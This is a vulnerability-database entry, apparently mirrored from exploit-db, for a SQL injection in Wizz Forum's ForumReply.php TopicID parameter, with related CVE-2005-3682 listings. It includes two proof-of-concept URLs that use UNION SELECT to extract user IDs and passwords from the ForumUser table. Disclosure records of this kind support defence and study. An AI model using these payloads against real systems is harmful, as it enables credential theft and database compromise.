Lucene search
HACKERS PALEDB-ID:26504HistoryNov 14, 2005 - 12:00 a.m.
Wizz Forum - 'forumreply.php?TopicID' SQL Injection
2005-11-1400:00:00
HACKERS PAL
www.exploit-db.com
32
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/15410/info
Wizz Forum is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
http://www.example.com/ForumReply.php?TopicID=-10%20union%20select%201,userid,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1
http://www.example.com/ForumReply.php?TopicID=-10%20union%20select%201,password,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1 Related
cvelist
cvelist
CVE-2005-3682
2005-11-18 23:00:00
exploitdb
exploitdb
Wizz Forum - 'ForumAuthDetails.php?AuthID' SQL Injection
2005-11-14 00:00:00
Wizz Forum 1.20 - 'TopicID' SQL Injection
2005-11-14 00:00:00
nvd
nvd
CVE-2005-3682
2005-11-18 23:03:00
cve
cve
CVE-2005-3682
2005-11-18 23:03:00